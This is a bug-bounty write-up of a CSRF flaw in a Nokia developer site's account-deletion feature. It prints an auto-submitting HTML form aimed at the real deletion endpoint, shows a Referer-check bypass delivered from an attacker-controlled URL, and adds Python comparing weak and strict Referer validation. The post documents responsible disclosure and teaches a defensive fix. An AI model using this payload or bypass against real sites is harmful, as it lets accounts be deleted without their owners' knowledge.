A CSRF in Nokia with a Referer Bypass
This post is about a CSRF vulnerability in Nokia that I was able to exploit to delete accounts using a simple bypass, which earned me their Hall of Fame recognition.
https://www.nokia.com/notices/responsible-disclosure/
What is CSRF? #
A CSRF attack involves performing an action on a victim's user account without their awareness. This can allow an attacker to change a victim's password or email, and even delete their account.
Reproducing the vulnerability #
Step 1 - Testing for CSRF #
While testing, I noticed that the account deletion functionality wasn't using any CSRF tokens, so I started testing for CSRF. The plain CSRF exploit was unsuccessful, so I had to start testing different bypasses.
When I attempted to delete my account without the Referer header, the site displayed an error. This suggests that the site relies on Referer-based CSRF protection, which can be bypassed by placing the trusted domain in the query string of the attacker's URL, like this:
http://<ATTACKER_IP>/csrf.html?nokia.com
Step 2 - Crafting the CSRF Document #
Using devtools, I inspected the delete-account code block and noted the path and the POST method used.
I proceeded to craft the malicious HTML document:
<form method="POST" action="https://network.developer.nokia.com/accounts/profile/requestaccountdeletion">
</form>
<script>
document.forms[0].submit();
</script>
Step 3 - Triggering the CSRF #
I used my DigitalOcean VPS to deliver the exploit, but alternatives like replit can also be used, and it's free.
Here’s the final link including the bypass:
http://<ATTACKER_IP>/csrf.html?network.developer.nokia.com
I accessed the link, and observed the successful deletion of my account.
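The bypass in Steps 1 and 3 works because a Referer check that only looks for the trusted domain as a substring accepts any URL that mentions it. As an added example (not code from the post or from Nokia), here is that weak check beside a strict one that parses the header and compares the exact host; the sample Referer values are constructed, with 203.0.113.5 standing in for the attacker's IP.

```python
from urllib.parse import urlsplit

# Host the vulnerable form in the post submits to.
TRUSTED_HOSTS = {"network.developer.nokia.com"}


def weak_referer_check(referer):
    """Substring match. The post's bypass defeats this: the trusted host name
    merely appears in the query string of the attacker's URL."""
    return referer is not None and any(h in referer for h in TRUSTED_HOSTS)


def strict_referer_check(referer):
    """Parse the header and require an exact, case-insensitive host match over
    HTTPS. Missing or malformed Referer values are rejected, not tolerated."""
    if not referer:
        return False
    try:
        parts = urlsplit(referer)
    except ValueError:
        return False
    # .hostname is lowercased and has any port stripped.
    return parts.scheme == "https" and parts.hostname in TRUSTED_HOSTS


# Constructed sample Referer values with the verdict a correct check should give.
SAMPLES = {
    "https://network.developer.nokia.com/accounts/profile": True,          # legitimate same-site request
    "http://203.0.113.5/csrf.html?network.developer.nokia.com": False,     # the post's bypass URL
    "https://network.developer.nokia.com.attacker.example/": False,       # trusted name as a prefix of another host
    None: False,                                                           # header absent
}


def evaluate(check):
    """Run a check over every sample; compare the result with SAMPLES to see
    which verdicts it gets wrong."""
    return {ref: check(ref) for ref in SAMPLES}


if __name__ == "__main__":
    for name, check in (("weak", weak_referer_check), ("strict", strict_referer_check)):
        wrong = [ref for ref, verdict in evaluate(check).items() if verdict != SAMPLES[ref]]
        print(f"{name}: {len(wrong)} wrong verdict(s) {wrong}")
```

A Referer or Origin check is only a secondary defense; the primary fix for the issue described here is a per-session anti-CSRF token on the deletion request.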
Conclusion #
This writeup covers a CSRF in the account deletion functionality that allowed attackers to delete accounts via a single link using this simple Referer bypass.
By responsibly disclosing this issue, I received recognition in Nokia’s Hall of Fame page (2023).